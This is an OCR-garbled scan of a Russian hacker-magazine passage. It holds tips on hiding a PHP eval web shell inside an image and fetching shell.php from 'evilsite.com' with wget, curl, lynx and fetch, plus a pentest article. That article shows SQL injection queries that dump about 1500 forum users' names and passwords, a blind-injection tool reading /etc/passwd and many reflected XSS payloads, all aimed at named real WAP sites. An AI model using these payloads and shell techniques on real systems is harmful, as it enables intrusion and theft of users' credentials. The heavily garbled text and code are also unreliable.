нескольких кодировок и т.д. К тому же, присутствует нужный нам функ- 
ционал по кодированию в Ьазе64, бех, II ПІ_- кодирование и еще куча 



всего. Несомненным плюсом является бесплатность. Так что качаем, 
ставим и наслаждаемся. 

2. Если по каким-либо причинам тебе нужен онлайн-кодировщик, то вот 
три линка, которые решат любую задачу в этой области: 

озбегтіііег . огд/саіс/епсобе . ТШтІ СоругідТШ Зберкеп 
Озбегтіііег 

Алгоритмы: ІЖЬ, Вазе 64, Нех 
похак. ги/ЕооІз/сосІе/ автор Зп@кЗ 

Алгоритмы: Рагзег ІШЬ, Вазе 64 (епсобе/бесобе) , 2 =>10 

сис.счис, 10 => 2 сис.счис, 10 => 8 сис . счис , 8 => 10 сис . 
счис. Зеркало, Зоипбех (епсобе) ,АЗСІІ код, Нех(епсосіе) , 
ІШЬ (епсобе/бесобе) , МБ 5 казк ( епсобе) , Сгс32 (епсосіе) , 
КОТ13 (епсобе/бесобе) , СЬаг (епсосіе) , БесітаІ епсосіе 
диезб . ІзЪ-ту . пате/сосіе . ркр ну и кухонный комбайн от 
ВІаскЗип' а 

Список алгоритмов не пишу, он более чем внушительный. 
Загляни сам, думаю, найдешь все, что нужно. 
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№4 



ЗАДАЧА: СОХРАНИТЬ ШЕЛЛ ДЛЯ УДА- 
ЛЕННОГО ИНКЛУДА 



1. Создаем любое изображение. 

$ еско "<?ркр еѵаі ( $_КЕС>ІІЕЗТ [спкЗ] ; 

рьр 



;?>" > зітр1е_зке11 . 



РЕШЕНИЕ: 

Я не буду описывать способы всем давно известные (можно положить на свой 
сервер, на народ, на залитый уже шелл], но есть способ, о котором мне еще 
слышать не приходилось, — он позволяетхранить шелл достаточно долго и 
при этом не палить свои сервера и шеллы. Заливать шелл будем на файловый 
хостинг, который даетпрямыелинки нахранимыефайлы. Предложил исполь- 
зовать этот способ деегег_сосІе. 



$ саб І.зред зітр1е_зке11 .ркр » роізопеб. пред 
Картинка готова к за грузке. 

2. Загружаем ее без ресайзинга и любых других преобразований (это 
важно), например, на тааезЬаск.из . 

3. Теперь можно инклудить ее по прямой ссылке с файлообменника. 



№5 



ЗАДАЧА: НАЙТИ САЙТ, КОТОРОМУ 
ПРИНАДЛЕЖИТ СЛУЧАЙНО ОБНАРУ- 
ЖЕННАЯ ТАБЛИЦА С ПАРОЛЯМИ ПРИ 
ИСПОЛЬЗОВАНИИ БОЬИНЪЕКЦИИ 



РЕШЕНИЕ: 

1. Сперва попытаемся извлечь контент сайта, сохраненный в базе, и поп- 
робуем однозначно идентифицировать его через поисковики (яндекс или 
гугл]. Контентом может являться что угодно — новость, пост на форуме, 
запись в блоге и т.п. 

Для этого мы просто ищем таблицы, схожие по смыслу, например, теззадез, 
розбв, пеѵѵз, агбсіез, соплплепіь и извлекаем из них контент. К примеру, делаем 
запрос 

зібе . сот/зсгірб . ркр?іб=-1+ипіоп+зе1есб+1 , тез заде , 3 + бг 
от+теззадез--+ 

и ищем ответ в гугле: 



Ьббр :/ /шт. доодіе . сот/ зеагск?д= " контент из базы" 

2. Если сайт не проиндексирован гуглом, ищем ссылки в самой базе. Для 
этого используем следующий Ііке-запрос. 

кббр : / /зібе . сот/зсгірб . ркр?іс1=-1+ипіоп+зе1есб + 1 , дгоир_ 
сопсаб (сопсаб_члз ( 0x3 А, баЫе_зскета , баЫе_пате , со1итп_ 
пате) ) , 3+бгот+іпбогтабіоп_зскета . соіитпз+ѵбкеге+со1итп_ 
пате+1іке+ ' %кббр ://%'--+ 
или кббр : //зібе . сот/зсгірб . рЪр?ісІ=-1- 
+ипіоп+зе1есб+1 , дгоир_сопсаб (сопсаб_члз ( ОхЗА, баЫе_ 
зскета , баЪ1е_пате , со1шпп_пате) ) , 3+бгот+іпбогтабіоп_ 
зскета . соіитпз+\Щлеге+со1итп_пате+1іке+ ' % . ркр% 1 -- + 

и из полученных результатов выбираем локальные ссылки (наверняка, они 
будщ). 



№6 



ЗАДАЧА: УБРАТЬ ПОВТОРЫ 
СТРОК ИЗ ФАЙЛА 



РЕШЕНИЕ: 

Часто возникает необходимость убрать повторы из текстовика. При 
сборке своего словаря, при парсинге логов, баз. В общем, думаю, ты 
частенько сталкивался с такого рода проблемой. Да, существует куча 
программ для работы со словарями, толпы написанных парсеров и т.д., 
но мы пойдем другим путем. 

1. Решение через РНР. 

Создаем рбр-парсер без наворотов. Комментарии я привел в коде, 
думаю, там все понятно. Сортировка по алфавиту и удаление повторов, 
это то, что в 90% случаев требуется сделать. 

<?ркр 

$бі1е= бііе ( ' 1 . бхб ' ) ; // файл на входе 

зогб ($бі1е); // сортируем по алфавиту 

$бі1е = аггау_ипідие ( $бі!е) ; // убираем повторы 



богеаск ( $бі1е аз $ѵа1) { 
$епб .= $ѵа1 ; 

} 

$оиб = бореп ( ' 2 . бхб * , 'и' ) 
бѵ^гібе ( $оиб , $епб) ; 
бсіозе ( $оиб) ; 

?> 



// файл на выходе 



Файл, который нужно отпарсить, может быть и удаленным, и задаваться 
следующим образом: 

$бі1е= бііе ( / кббр://127.0.0.1/1.бхбЩ ; 

Главное, чтобы это позволили настройки РНР-интерпретатора. 

2. Консольное решение. 

Владельцам линухов заморачиваться со скриптами вообще не требует- 
ся. Все давно реализовано в консоли: 

саб 1 . бхб | зогб I ипід > 2.бхб 

То же самое, разумеется, можно проделать в шелле, когда отпарсить 
файл нужно «на месте». 

<?ркр 

$6і1е= бііе ( 7 1 . бхб ' ) ; // файл на входе 

зогб ($6і1е); // сортируем по алфавиту 

$6і1е = аггау_ипідие ( $6і1е) ; // убираем повторы 

богеаск ( $6і1е аз $ѵа1) { 

$епб .= $ѵа1 ; 

} 

$оиб=бореп ( ' 2 . бхб ’ , 'от' ) ; II файл на выходе 
бѵпгібе ( $оиб , $епб) ; 
бсіозе ( $оиб) ; 
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ЗАДАЧА: СДЕЛАТЬ ПОЛНОЦЕННЫЙ 
ПРОКСИ-СЕРВЕР ИЗ ЗАЛИТОГО ШЕЛЛА 
НА УЯЗВИМОЙ МАШИНЕ 



РЕШЕНИЕ: 

Существует несколько популярных решений подходящих для таких 
целей. 

1. Для прокси с протоколом Шр я советую использовать рргоху, пото- 
му что проект обладает рядом весомых характеристик. 

Состоит из двух частей 

На удаленный веб-сервер заливается первая часть прокси, 
написанная на РНР — скрипт рргоху.ркр 

На локалхосте запускается вторая часть прокси, реализо- 
ванная на Регі (скрипт ріосаі.рі) , 
которая прослушивает порт как 
НТТР-прокси. На этот локальный 
ЬРРр-прокси настраивается, напри- 
мер, браузер 



бинарники размером от 9 до 16 Кб 

Поддерживается аутентификация по логину : паролю 
Клиент может передавать адрес сервера как в виде Б/РГ, так 
и в виде ІРѵ4 (ІРѵб не поддерживается) 

Поддерживается только метод соппесР . Это объясняется 
тем, что я просто не знаю софт, использующий другие мето- 
ды простокола Зоскзб. 

Исходник занимает 1 файл размером менее 10 Кб — при 
необходимости 5 00 строк кода можно скопипастить через 
зРбіп . 

Берем проксик по адресу Ьгит.апіісбаі.ги/зіпоѵѵрозк 
рЬр?р=1 76928&роз(соип1=1 или с БѴБ. 



Легендарный ЗаіапісЗоскзЗегѵег 

/ - 



Страница релиза — ит.апбсбаСги/ 
зЬоѵѵро5ірЬр?р=959778&ро5ІсоипІ=1 (либо 
бери с нашего БѴБ). 

2 . Для прокси с протоколом Зоскзб исполь- 
зуем легендарный Заіапіс Зоскз Зегѵег, 
потому как он 

Написан на Си 

Компилируется в Шіх и Шпскжз 
системах — я тестировал программу 
в различных дистрибутивах Ыпих и 
РгееВЗБ, а также в Ш.пскжз ХР (нет 
причин, по которым программа не долж- 
на собираться в других операционках) 
Не требует гооР -приведений 
Размер бинарника в формате РЕ : 2,5 
Кб. В формате ЕЬР может менять- 
ся в зависимости от ОС, я получал 
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I И М ЗАДАЧА: ВЫДЕЛИТЬ НАИБОЛЕЕ П0- 

I I Пи ЛЕЗНЫЕ КОМАНДЫ ДЛЯ БАГОИСКАТЕ- 
Ц дЧ ЛЯ ПОСЛЕ ЗАЛИВКИ САМОПАЛЬНОГО 

ВАСКСОЫЫЕСТ-ШЕЛЛА 

РЕШЕНИЕ: 

1. Поиск директорий, доступных на запись, относительно текущей 

Ріпб . -регш -2 -Руре б -1з 

2 . Поиск файлов с установленным ЗІбЮ-битом 

Ріпб / -Руре Р -регш -04000 -1з 

3. Поиск конфигурационных файлов 

Ріпб / -Руре Р -пате " сопРід*" 

4 . Поиск так называемых качалок 



4 . Качалка ѵѵдеі 

идеР Ь.РРр : / / еѵіІзіРе . сот/ зііеіі . РхР -О /Ноте/изег/члплм/зйеіі .рЬр 

5. Качалка сигі 

сигі ЬРРр: //еѵіІзіРе. сот/ зііеіі. РхР -о /Ноте/изег/чдПлм/зЬ.еІІ .рЬр 

6 . Качалка Ііпкз 

Ііпкз -зоигсе НРРр : //еѵіІзіРе . сот/зкеіі . РхР > /Рюте/изег/ 
иѵш/зііеіі . ркр 

7. Качалка Іупх 

Іупх -зоигсе кРРр : //еѵіІзіРе . сот/зЬеІІ . РхР > /Ноте /из ег / 
ѵдлпл/ зкеі 1 . рНр 

8 . Качалка беІсЬ 



мЫсЬ ѵ/деР ; ѵ/ЬісЬ. сигі; ѵ/ЬісЬ. Іупх; вдЫсЬ Ііпкз; ѵ/ЫсЬ РеРсЬ. 



РеРсН -о НРРр : //еѵіІзіРе . сот/ зкеІІ . РхР -р /Ноте/изег/ 
шт / зке 1 1 . рЬр т 
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ПЕНТЕСТИНГ П0ИСКУЯЗВИМ0СТЕЙ 

В СОВРЕМЕННЫХ ѴѴАР-САЙТАХ 



САМАЯ ГЛАВНАЯ ОСОБЕННОСТЬ САЙТОВ МОБИЛЬНОГО ИНТЕРНЕТА 
ЗАКЛЮЧАЕТСЯ В ТОМ. ЧТО ПРАКТИЧЕСКИ ВСЕ ОНИ ПИШУТСЯ 
САМОСТОЯТЕЛЬНО - НИКАКИХ ТЕБЕ ОПЕНСОРС СМ3. КАК В БОЛЬШОМ 
ВЕБЕ. ОТСЮДА ВЫТЕКАЕТ СЛОЖНОСТЬ ПОИСКА БАГОВ. ВЕДЬ ИСХОДНИКИ 
ЭТИХ САЙТОВ НЕДОСТУПНЫ ПЫТЛИВОМУ ВЗОРУ ХАКЕРА. 



Два года назад ты мог прочитать мою увле- 
кательную историю о нахождении глупейших 
уязвимостей в крупных самописных порта- 
лах, ориентированных на просмотр прямо 
с экрана твоего мобильника. Настала пора 
проверить текущий уровень защищенности 
популярных ѴѴАР- проектов. Сперва я вкратце 
расскажу о некоторых изменениях в мобиль- 
ном мире, которые произошли за последние 
пару лет: 

1. Повальный переход на технологию ѴѴАР 2.0 
(цветные хНТМІ_-странички, которые теперь 
можно просматривать на компьютере не толь- 
ко с помощью Оперы] и, соответственно, уход 
в небытие ѴѴАР 1 .1 -1 .3 с его черно-белыми 
ѴѴМІ_-страницами (хотя в качестве опции он 
еще остался на многих сайтах); 

2 . Развитие социальных функций: знакомства, 
чаты, форумы — все, как в большом вебе; 

3. Тотально возросший трафик (у кого сейчас 
нет мобилки с дргз/есІде/Зд/ѵѵіЛ/ѵѵітах/еѵсіо и 
дешевыми тарифами?); 

4 . Загнивающий рынок продаж мобильного 
контента (в противовес этому вырос рынок 
мобильной рекламы, ты даже не представля- 
ешь, какие деньги там сейчас крутятся); 



5 . Огромнейшее количество халявного кон- 
тента; 

6 . Приход в ѴѴАР специалистов разработчиков 
из большого веба, соответственно, повы- 
шенный уровень качества и безопасности 
скриптов. 

Благодаря последнему пункту мое иссле- 
дование получилось не таким легким, как я 
ожидал :). 

Итак, для проведения пентестинга было 
выбрано наугад и жестоко изнасиловано раз- 
ными хитрыми параметрами несколько топо- 
вых сайтов из популярных рейтингов ѵѵаріод. 
пеі и Іор.ѵѵаЬ.ги . 

У ВИТАЛИКА Одним из лидеров по коли- 
честву посетителей (5.5-6.5к уникальных 
хостов в сутки и стабильное 6-7 место в 
рейтинге Іор.ѵѵаЬ.ги ] является сайт ѵііаІік.Ьіг 
(не удивляйся такому странному домену — в 
вапе это в порядке вещей]. Несмотря на явно 
отечественное название, сайт ориентирован 
на англоговорящих пользователей. Здесь 
присутствуют все необходимые атрибуты 
современных мобильных порталов: халявные 
загрузки, форум, чат, знакомства. Зная, что 



олдскульные сайты (а ѵ ЧаІік.Ьіг работает с 
2004 года] писались новичками в рбр, я сразу 
принялся за раскопки. Самым уязвимым 
местом оказался форум: при запросе Ыір:// 
ѵкаІік.ЬігЛогит/геасІ іоріс.рЬр?ІІІМ=6ие5і&р 
а55=Сие5І&Іоріс=1 '&и5ег=1305&гоот= моему 
взору открылась замечательная ошибка 
тузді :). 

Шгпіпд: тузд1_РеРс]г_оЪ:і есР ( ) : 
зиррііесі агдитепР із пор а ѵаіісі 
Му 8(2 Ь гезиІР гезоигсе іп /Рюте2/ 
ѵіРаІікЪіг/ѵіРаІікЪіг/ѵл^лл/іюгипп/ 
геасі_Роріс . ркр оп Ііпе 216 

После недолгих попыток подобрать количе- 
ство столбцов и таблицу с юзерами у меня это 
получилось так: 

кРРр : //ѵіРаіік.Ьіг/ 
Рогит/геасі_Роріс . 

ркр?ІІШ=СиезР&разз=СиезР&Роріс=-99 
+ипіоп+зе1есР+1 , 2 , 3 , 4 , 5 , 6+Ргот+изе 
гз%23&изег=1305&гоот= 

(Здесь %23 — это символ решетки в 
игіепсосіе) 
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СКУЛЯ НА РКЕ2ІКА.ЫЕТ 



Цифра «3» выводилась прямо в теле поста. Теперь нужно 
было подобрать колонки с именем и паролем пользовате- 
ля. Ими, как это ни странно, оказались «пате» и «разе» 



кгие : кккр : //ѵіркоп . ги/зегѵ_д/китігу . 
р1?р=1&к=1&с = 1+АШ+1 = 1 — на экран выводится 
текст 

каізе : кккр : / /ѵіркоп . ги/зегѵ_д/китігу . 
р1?р=1&к=1&с=1+АкВ+1=2 — на экран ничего не 
выводится 



НТТР://ѴШѴѴ 



> Ііпкз 



'А&і '- оЛІ 



Х55 НА5ЕѴЕР.РІІ 



Итоговый запрос для вывода всех пользователей форума 
(а их было около 1500) выглядел следующим образом: 

кккр: //ѵіка1ік.ЪІ2/когит/геас1_коріс . 
ркр?иш=Сиезк&разз=Сиезк&коріс=-99+ипіоп+зе1 
еск + 1 , 2 , сопсак (пате , скаг (58 ) ,разз) ,4,5,6+кго 
т+изегз + 1ітік + 10 0%23&изег=13 05&гоот= 

Результат работы запроса ты можешь увидеть на скрин- 
шоте. 

Единственным огорчением от найденной баги было то, 
что она не позволяла работать с файлами. Но улов в 
полторы тысячи пользователей тоже был не такой плохой 
наградой. 

От себя добавлю, что подобного рода ошибки даже в 
большом вебе встречаются очень редко, так что с сайтом 
мне сильно повезло. 

ПЕРВЫЕ ОСЛОЖНЕНИЯ Больше таких багов, как 

у Виталика, мне не попадалось, так что к поиску 
новых дырок на других сайтах пришлось приложить 
некоторые усилия. Следующей жертвой оказался 
портал ѵіріоп.ги с посещаемостью 8-9 к уникальных 
посетителей в день по рейтингу ваплога. Здесь уяз- 
вимым оказался скрипт ШрУ/ѵірІюп.ги/зегѵ д/китігѵ. 
рІ?р=1&к=1&с=Г : 



Теперь мне необходим софт для работы с ЫіпсІ 
зрі. Таковым послужил перловый скрипт Электа 
«АпбсЬаІ: ЗОБ-Іюоіз бо г опе_5ІтѵоІ_ЬгиІ_соІитп5 
ѵ. 1.1.1», описание и ссылку на который ты можешь 
найти в сносках. Единственным косяком являлось 
то, что софт позволяет выбрать формат коммен- 
тария, но не позволяет выбрать его отсутствие (с 
комментариями запрос выдавал ошибку). Так что 
пришлось вносить кое-какие изменения в код 
скрипта : 

было, линия 190: 

ік ( $орк_с==2 ) { $орк_с= ' # 1 ; } 

стало, линии 190-191 
ік ( $орк_с==2 ) { $орк_с= 1 # 1 ; } 

ік ( $орк_с==3 ) { $орк_с= ' ' ; } 

Все готово для моих тестов :). Первым делом я узнал вер- 
сию тузрі: 5.1 .32: 

2 : /изг/1оса1/Ьіп/рег1 . ехе зд1_осЪ_111 . 
рі -и "кккр : / /ѵіркоп . ги/зегѵ_д/китігу . 
р1?р=1&к=1&с=1 " -с 3 -а "Скекко Созреі" 

-с — наш формат комментария 

-а — строка, которая присутствует при вер- 
ном запросе 



• Ьгит.апбсЬаЕги/ 
эЬоѵѵровІ.рТірТр" 
236186&розісоипі= 

2 — АпбсЬаІ: 5СИ- 
Іюоіз бог опе_5ІтѵоІ_ 
ЬгиІ_соІитп5 ѵ.1 .1 .1 . 

• Іюгит.апОсЬаЕги 
АбгеасІІ 9844.ЫтІ — 
подробно о сложных 
ЗОБ-инъекциях. 

• ѵѵаріод.пеі — самый 
популярный рейтинг 
вап-сайтов. 

• іор.ѵѵаЬ.пеі — 
старый и известный 
мобильный рейтинг. 

• Іор.ЬосІг.пеІ — еще 
один известный 
рейтинг. 



Зоккмаге еггог: 

БВБ : : тузді : : зк ехесике каііеб: Уои каѵе ап 
еггог іп уоиг ЗОЬ зупках; скеск кке тапиаі 
ккак соггезропбз ко уоиг МуЗОЬ зегѵег 
ѵегзіоп ког кке гідкк зупках ко изе пеаг 
' ' ) АЫБ (китіг_іб=1 ) ' ак ііпе 1 ак /изг/коте/ 
а81006/ѵіркоп. ги/ккт1/зегѵ_д/китігу .рі Ііпе 
67. 

К сожалению, на сервере была установлена какая-то ібз, 
которая успешно резала любое присутствие ключевого 
слова ипіоп в запросе, так что легкого взлома не получи- 
лось. 

Итого, мы имеем слепую скуль-инъекцию, для начала 
работы с которой следовало подобрать кие и кізе значе- 
ния. Ими оказались следующие запросы: 



Затем я попытался вывести первые 150 символов файла / 
еіс/раззѵѵсі: 

2 : /изг/1оса1/Ьіп/рег1 . ехе зд1_осЬ_111 . 
рі -и "кккр : / /ѵіркоп . ги/зегѵ_д/китігу . 
р1?р=1&к=1&с=1 " -с 3 -а "Скекко Созреі" -з 
" 1оаб_кі1е ( ' /екс/раззѵ«1 1 ) " -Ь 1 -п 0 -Ы 150 
-з — подзапрос, в данном случае загружаем 
файл /екс/раззмб 

-Ь — каким образом определяется длина стро- 
ки 

-п — начальный символ для брута 
-Ы — конечный символ для брута 

На удивление, содержимое первых 150 символов файла 
успешно сбрутилось :). 
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яЬйЬ- ііі зіНѴаІ ііі іі С1г і И >г ЬРНІ'іІйпСІ 



- > 1Г к-у 1 . . 2 

•> Тг* І .. І 
-> Тг* і .. в 
-> Ггу за .. 
-> Тгу 4Н - . 

-> 1>ѵ 4Н .. 

> ігу 4п .. 
-> Т і-у 5н ■) 
-> Лес ііі ІП 
-> г.ыг- "а- 



2ЬЬ - > СНя 1г< I л Ь 
ІІІ > СЬйР<(*4 
Ы -> Г,Ьпг>ЭЯ 
. Ы > СЬлгМВ 
М > СКлг<5* 

. ЬЬ -1 і.-Нт-^Ьг 
52 > СКлр>50 

■? і^оиио» 



# $ЕгееВ8Б: згс/екс/тазкег . 

раззчлгсС ѵ 1.40 2005/06/06 20:19:56 
Ьгоокз Ехр $ 

# 

гоок : * : 0 : 0 : СЬагІіе & : /гоок : /изг/ 

ІосаІ/Ьіп/ЬазЬ 

коог : * : 0 : 0 : Воигпе-адаіп 8ир 

Теперь следовало бы изучить исходники 
сайта на предмет более крупных багов, но 
это дело я оставляю тебе, ибо мне пора дви- 
гаться дальше. 

Р.5. Также на этом портале обнаружился 
намек на выполнение произвольного кода: 

Ыір ://ѵі рбоп . ги/г 

до.р[?д=:іс!І&ѵІ=1 257458294&іг=1 и еще одна 
скуль-инъекция: 

Ыір://ѵір1 : оп.ги/пеѵѵ5/[пеѵѵ5.р[?п=1 '&1=аЦ . 

ПЕРВЫЕ РАЗОЧАРОВАНИЯ далее в топ-50 

рейтингов - д/аріод.пеі и Іор.ѵѵаЬ.ги нашлись 
лишь зцЬинъекции, которые по каким-либо 
причинам мне не удалось раскрутить: 

1 . ѴіакІ.Ри ( 1 3к уникальных посетителей в 
день] — Ыір:/Мак1.ги/?с=додІоЬаІ5еагсЬ&гд 
= 1 &УѴб=1 

Здесь кавычка заменяется на две кавычки 
— довольно необычная, но глупая защита от 
инъекций. Тем не менее, мне удалось соста- 
вить верный запрос, исходя из этого форма- 
та: Шр:/Мак1.ги/?с=дод[оЬа[5еагсЬ&гд=1 &ѵѵЬ 
=%5С , ' )%23 . 

Скорее всего, это был ІЫЗЕРТ-запрос, так что 
в итоге вторая часть инсерта выглядела сле- 
дующим образом: 



ѴАШЕЗ ( 1 \ ' , ' 
'2009.11.06' 
' 1257478842 ' 



* 1 , * 1 , ' ' 
'06:40:42' 



Странным оказалось то, что при верно 
составленном запросе сайт не только не 
выводил на экран данные, но и ненадолго 
уходил в даун (профит из баги все-таки есть 
— это банальный отказ в обслуживании). 

2 . Ргеііка.ЫеІ: (очередное классное название 
домена и почти 20к уников в день] — Ыір :// 
рге 2 Іка.пеі/Ьоок.рЬр?і=Роіегѵа беѵзіѵеппозіі/ 
коііексіѵаі &6=553&5ІР=1 &гпб=801 0' . 

Тут засада была в том, что скуля находилась 
в последнем параметре ІЫЗЕРТ-запроса, а 
также версия мускула не позволяла провер- 
нуть фишку с «оп сіиріісаіе кеу ирсіаіе»: 



ЕККОК (5833) 

Сіазз : МуздІЗшагкОиегу . 



Еііе: /орк/Ьоте/ргегіка/мѵш/Ьоок. 
ркр 

Еипскіоп: ОПЕКУ. 

Еггог теззаде: Оиегу каііесі! 
Оиегу: ІМЗЕКТ ІОШЕЕ ШТО 'ѵфи_ 
гзк ' 

( 'шосіиіе ' , 

'розк_ісГ , 

4 гекегег ' 

) ѴАШЕ5 ( 

’ Ьоок 1 , 

'553 Щ 

' /Ьоок . рЬр?к=Рокегуа_ 
сіеѵзкѵеппозкі/ 
ко11ексіуа1&с!=553&гпс1=8010 ' ' 



Е_МУ80Ь: Уои Ьаѵе ап еггог 
іп уоиг 80Ь зупках; сЬеск кЬе 
шапиаі кЬак соггезропЬз ко уоиг 
МуЗОЬ зегѵег ѵегзіоп ког кЬе 
гідЬк зупках ко изе пеаг ' ' / 

Ьоок . рЬр?к=Рокегуа_с!еѵзкѵеппозкі/ 
ко11ексіуа1&с!=553&гпс1=8010 ' ' 

' ак 

Ііпе 8 

ЕШ_ЕККОК-- 

НОВАЯ ЖИЗНЬ СТАРЫХ БАГОВ Настало 

время для небольшого, но очень важного 
отступления. Как ты уже знаешь, основная 
масса мобильных порталов давно перешла на 
технологию ѴѴАР 2.0, и, как оказалось, с при- 
ходом хНТМЕ в мобильном интернете крайне 
остро проявилась проблема банального Х55! 
Внимательный читатель скажет: «но ведь 
спецификация ѴѴАР 2.0 не поддерживает 
ЗаѵаЗсгірІ?». Это утверждение было бы вер- 
ным, если бы не два больших «но»: 

1. Браузеры современных мобильных 
телефонов (особенно смартфонов, а 
также мобильная Опера] вполне успешно 
поддерживают Іаѵа5сгір1 в теле хНТМБ- 
документа, не выдавая никакой ошибки. 

2. Все больше обычных веб-юзеров 
посещают сайты мобильного интернета 
с домашнего компьютера (в том числе 

и админы вап-сайтов — наша основная 
цель]. 



-> Тг* I .. 255 
-> Т гѵ і ^В 

-> Гр ѵ I - - Ы 
) I .. 12 

- > Т ь-ѵ 1 - - Е В 
О Тру 1 .. » 

-> Тгу I -> N0 

-> Ггу 2 > НО 

-> Тгу 1 -> N0 
-> І>Ѵ 4 -> НО 



■ 1 ПѴО 1 ІП Е(:ппір ѴЕ-ГіІбпО 

. . 255 СКар<і21 
. . 1 » -> 

. . М -> 

,.12 > СКл р< 1 & 

. . ЕВ - > СЬлгС Й 
. . » ^ Скмг<4 

-і НО -С 
-> НО -4 



ВфСІІІІ ЕіріяІ Сс]ьчг> - 5 гі г 12 



\ЫгУ і іт:І*-И Гі! I I . 



РАБОТА ТУЛЗЫ ОТЭЛЕКТА 






СКУЛЯ НА ВТАКТ.РУ 



* - N т 
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Принимая во внимание эти факты, 
можно смело писать массовые эксплой- 
ты под обилие уязвимостей кросс-сайт 
скриптинга на мобильных порталах, 
создатели которых и не подозревали о 
проявлении такого рода багов в ѴѴАР ■]. 
Смотри сам. 

1. Эрасез.Ри (450 к уников): 

Ьккр : / /зрасез . ги/Ьіагу / ?к=14 ; па 
ше=ЕЬіпзкѵеппозк ; зісі= 1998668821 
293105 ; геаЬ= 123 6483 698 ; корісз_р 
=1 ; р=1 ; ср= " ><зсгірк>а1егк ( 111 ) </ 
зсгіркх " &кгош=Ыагіез ; огЬег = 0 

2. ЗтагГи.ЫеІ: (Юкуников): 

Ьккр : / /зшагки . пек/к/ Ьекаіі. рЬр? 
Ыг=2тЕкЬ2 ІиЬШ іаШхІЬ2<ІЬЫл[Ѵ2&кі 
1е=ОХЕ02ХІреЕЕи2Е9і2^хреЕѴиУ291Ь 
пЫскЫз2Ш9\ѵУХЕуУѴ92Мі4хЬз АоѴкЬВК 
85уУХІ=&М= " ><зсгірк>а1егк ( 111 ) </ 
зсгіркх " & зогк = Ьаке&кѵ7=І2 

Ьккр : / /зшагки . пек / к/сотшепк . 
рЬр?зкагк = 2 5&Ьіг=2тЕкМЗ ЬкХ2 
ѴкЬЗЫѵ2п0ѵаѴ/5 02ХІи2ХО=&кі1 
е=Орега_МоЬі1е_ѵЮ . 0 . 275еп . 
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<ГІП20 5> 

>):8407 

<ЕІИШ 5> 

Вшпо;йа 

<Ріпго 5> 

Рогилп:1987 

<РІПІО б> 

агадоп: 17150 

<Ріпго 5> 

іепу'Папзіе* 

<Р)П20 5> 

МеегѵЗап 



СКУЛЬ-ИНЪЕКЦИЯ В ѴІТАЫК.ВІ2 

6&іс12 = " хзсгірр>а1егр ( 111 ) </ 
зсгіррх " &с!ігпатедд=1 

кРРр: //маргік. ги/Рету / іпсіех . 
ркр?Р=Зопу_Егісззоп/К77 0 
К7 9 0 , _К8 0 0 , _К8 1 0 , _М5 8 0 , _М8 3 О , _ 
Ѵ7850 ,Ѵ\^880 , _35 О 0 , _Т65 0 (рагР2 ) / ! Ап 
ішігіѵаппуее/&ѵ= " хзсгірр>а1егр ( 
111) </ зсгіррх " 

5. ОІатту.Ви (20 к уников): 

кРРр : / /ѵг ар . діатту . ги : 8080 / 
аиРЬогігесІ/ ^ оигпаІКаРіпд . з зр ; з з 
еззіопіс!=Б8 бВЗ 6АБ62 0Е2БЕ5Е33894 
5В9 8 87АЕ8 5 ?г= " хзсгірр>а1егр (11 
1 ) < / зсгіррх "&г=1257457117009&с= 
2&с=2&раде=2 

кРРр : / /ѵг ар . діатту . ги : 8080 / 
аиРЬогігесІ/ѵіеотОаІІегу .^зр; 
Ззеззіопіс1=Б8бВЗ 6АБ62 0Е2БЕ5 



Ъ=&рЪ=125745658333148 

кВРр : / /ѵРакР . ги/ ? 

с = сіе 1_с оттепР &с іт_ 

ісЗ= " ><зсгірр>а1егр ( 111 ) </ 

зсгіррх " &сР = 4&іт_іс!=18 8 

кРРр : / /ѵРакР . ги/ ?с = 1д&дѵ7Г=1д&дм 
г=соттѵіем&сР= " хзсгірр>а1егр ( 11 
1 ) </ зсгіррх " &іт_іс!=18 8 

Ъ.РРр : / /ѵРакР . ги/ ?с= РогитРорісте 
зз&&1Ъ=102&Ре= " хзсгірр>а1егр (11 
1 ) </ зсгіррх " &Ра=1 

кРРр : / /ѵРакР . ги/ ?с=1д&дмг=Рогит 
Роріс1ізР&1Ъ=" ><зсгірР>а1егР (11 
1 ) </ зсгіррх " &Ра=1 

Ъ.РРр : / /ѵРакР . ги / ?с = 1д&дѵ\гг=оп1іпе 
Ь.е1р1ізРс1еР&з(і(і= " хзсгірр>а1егр ( 
111 ) </ зсгіррх " 

7. ѴѴзе.Зи (9 к уников): 



<Р?П20 5> 

йосіоп .эйд 



Е338945В9 8 87АЕ8 5 ? іс!=11 8 87 7 & 
с = 2&г="хзсгірр>а1егр ( 111 ) </ 
зсгіррх " &Руре=1&раде=1 



РРРр : / /ѵг зе . зи/сіошііоасіз / іпсіех 
ркр?Р = " хзсгірр>а1егр ( 111 ) </ 
зсгіррх " 



<РІП20 5> 

метоіі:МеЯтеі 

<РІП20 5> 

Ыаск *етаіе: таШареЮ 

<РІП20 5> 

те тѵзеІТ &:таІІіаоеІо 

ПОЛЬЗОВАТЕЛИ ФОРУМА ѴІТАЫК. 
ВІ2 

зіз&М= " ><зсгірр>а1егр ( 111 ) </ 
зсгіррх " &зогР=&Рм=1 

3. Зеѵег.Ки (70к уников): 

кРРр : / / зеѵег .ги/ісд/изег/ 

Іодіп . ркр?зіс1=6104ЫеР74б0 
е1а82 01аас92 Р5е81еЬ9&изегп 
ате= " ><зсгірр>а1егр ( 111 ) </ 
зсгіррх " &раззѵ\гагс1=1 

4. ѴѴа ргі к. Р и (23 к уников): 



кРРр : / /ѵг ар . діатту . ги : 8080 / 
аиРЬогігесі/пехѵЬіеКаРіпд . Д зр; Д зез 
зіопісі=Б8 бВЗ 6АБ62 0Е2БЕ5ЕЗЗ 8945В9 
887АЕ85?г=1257457111983&г=125745 
7111991&с=2&с=" хзсгірр>аіегр ( 11 
1) </ зсгіррх " &раде = 2 

кРРр : / /мар . діатту . ги : 8080 / 
аиРЪ.огІ2ес1/ѵіемРгіепс1з . э зр; з зезз 
іопісІ=В8 бВЗ 6АБ62 0Е2БЕ5ЕЗ 3 8 9 4 5В9 8 
87АЕ8 5 ?ісі=118 87 7 &с = " хзсгірр>а1е 
гР (111) </ зсгіррх" &г=12574571427 
09&раде=2 

6. ѴіакРРи (уже знакомый тебе сайт бук- 
вально кишит Х58): 

кРРр : / /ѵРакР . 

ги / ?с = " хзсгірр>а1егр ( 111 ) </ 
зсгіррх " &дмг=апзмег_ 

ИНЪЕКЦИЯ НАѴІРРОЫ.РІ) 



И это далеко не все, так что запомни: хзз- 
уязвимостям в вапе быть! 

ЗЛОКЛЮЧЕНИЕ В наше время создатели 
мобильных порталов стали настоящими 
специалистами в сайтостроении и уже 
